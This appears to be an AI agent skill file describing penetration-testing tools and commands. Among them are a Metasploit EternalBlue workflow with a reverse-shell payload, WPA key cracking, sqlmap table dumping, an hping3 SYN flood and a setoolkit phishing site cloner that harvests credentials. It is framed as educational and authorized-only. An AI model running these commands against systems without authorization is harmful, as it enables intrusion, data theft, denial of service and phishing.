Agent Skillset: Ethical Hacking & Penetration Testing
Overview
This agent possesses knowledge of standard industry tools found in distributions like Kali Linux. The agent utilizes these skills to identify vulnerabilities, audit system security, and simulate attacks to improve defense mechanisms.
WARNING: These commands are for educational and authorized testing purposes only. Executing these against networks or systems without explicit permission is illegal.
Core Competencies
1. Network Reconnaissance & Mapping
- Primary Tool:
nmap - Description: Discovery of hosts and services on a computer network.
- Standard Operations:
- Basic Scan: Scan a target IP or domain for open ports.
nmap <target_ip_or_url> - Aggressive Scan: Enables OS detection, version detection, script scanning, and traceroute.
nmap -A <target_ip_or_url>
- Basic Scan: Scan a target IP or domain for open ports.
2. Network Traffic Analysis
- Primary Tool:
wireshark - Description: Graphical tool for deep inspection of network protocols and data packets.
- Standard Operations:
- Launch GUI:
wireshark - Workflow:
- Select network interface (e.g.,
eth0,wlan0). - Click the blue "Shark fin" icon to start capturing.
- Apply display filters (e.g.,
http,ip.addr == <target_ip>) to isolate specific traffic. - Right-click a packet -> "Follow TCP Stream" to see the full data payload.
- Select network interface (e.g.,
- Launch GUI:
3. Exploitation & Payload Delivery
- Primary Tool:
metasploit-framework - Description: Framework for developing and executing exploit code.
- Standard Operations:
- Launch Console:
msfconsole - Exploit Workflow (Example: EternalBlue):
search EternalBlue # Find relevant exploits use exploit/windows/smb/... # Select the exploit module set PAYLOAD <payload_type> # e.g., windows/x64/meterpreter/reverse_tcp set LHOST <your_ip> # Set your listening IP set RHOSTS <target_ip> # Set the target IP exploit # Launch the attack
- Launch Console:
4. Wireless Network Assessment
- Primary Tool:
aircrack-ngsuite - Description: Assess WiFi network security and crack WEP/WPA keys.
- Standard Operations:
- Monitor Mode: Put the wireless card into monitor mode.
airmon-ng start wlan0 - Capture Packets: Sniff traffic to capture the WPA handshake.
airodump-ng <interface_name> - Crack Key: Attempt to crack the captured handshake using a wordlist.
aircrack-ng -w <wordlist_file> <capture_file.cap>
- Monitor Mode: Put the wireless card into monitor mode.
5. Credential Security & Password Auditing
- Primary Tool:
hashcat - Description: Advanced password recovery using CPU/GPU power.
- Standard Operations:
- Basic Dictionary Attack:
# -m 0 = MD5 hashing mode # -a 0 = Dictionary attack mode hashcat -m 0 -a 0 <hash_file> /usr/share/wordlists/rockyou.txt
- Basic Dictionary Attack:
6. Web Application Vulnerability Scanning
- Primary Tool:
skipfish - Description: Active web application security reconnaissance.
- Standard Operations:
- Crawl & Scan:
# -o creates an output directory for the report skipfish -o <output_directory> <target_url>
- Crawl & Scan:
7. Forensic Data Recovery
- Primary Tool:
foremost - Description: Recover lost files based on headers and internal structures.
- Standard Operations:
- Recover All Types:
foremost -i <image_file_or_drive> - Recover Specific Types: Recover only specific file types (e.g., jpg, pdf).
foremost -t jpg,pdf -i <image_file>
- Recover All Types:
8. Database Penetration Testing
- Primary Tool:
sqlmap - Description: Automates detection and exploitation of SQL injection flaws.
- Standard Operations:
- Basic Scan:
sqlmap -u <target_url_with_parameters> - Enumerate Databases: List all databases on the server.
sqlmap -u <target_url> --dbs - Dump Data: Extract data from a specific table.
sqlmap -u <target_url> -D <database_name> -T <table_name> --dump
- Basic Scan:
9. Network Stress Testing (DoS)
- Primary Tool:
hping3 - Description: Packet assembler/analyzer for stress testing (DoS).
- Standard Operations:
- SYN Flood Attack: Send SYN packets as fast as possible to flood the target.
# -S = SYN flag # --flood = send packets as fast as possible hping3 -S --flood -V <target_ip>
- SYN Flood Attack: Send SYN packets as fast as possible to flood the target.
10. Social Engineering Simulation
- Primary Tool: Social-Engineer Toolkit (
setoolkit) - Description: Framework for social engineering attacks (phishing, etc.).
- Standard Operations:
- Launch Toolkit:
setoolkit - Workflow:
- Select
1for Social-Engineering Attacks. - Select
2for Website Attack Vectors. - Select
3for Credential Harvester Attack Method. - Select
2for Site Cloner. - Enter the URL to clone and your local IP to receive the credentials.
- Select
- Launch Toolkit: